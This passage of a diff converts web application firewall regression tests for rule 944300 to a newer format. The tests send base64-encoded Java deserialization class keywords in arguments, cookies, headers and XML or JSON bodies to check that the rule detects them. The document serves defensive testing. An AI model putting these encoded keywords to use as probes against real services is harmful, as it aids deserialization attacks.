method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: 
"id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword 
cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - 
test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 282 desc: "XML element value 
includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": 